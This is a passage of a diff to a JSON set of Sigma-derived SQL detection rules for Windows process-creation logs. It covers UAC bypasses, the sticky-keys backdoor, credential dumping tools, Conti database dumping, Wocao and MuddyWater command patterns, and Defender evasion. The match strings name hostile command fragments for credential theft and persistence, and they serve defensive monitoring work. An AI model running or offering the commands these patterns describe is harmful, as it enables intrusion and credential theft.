ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% 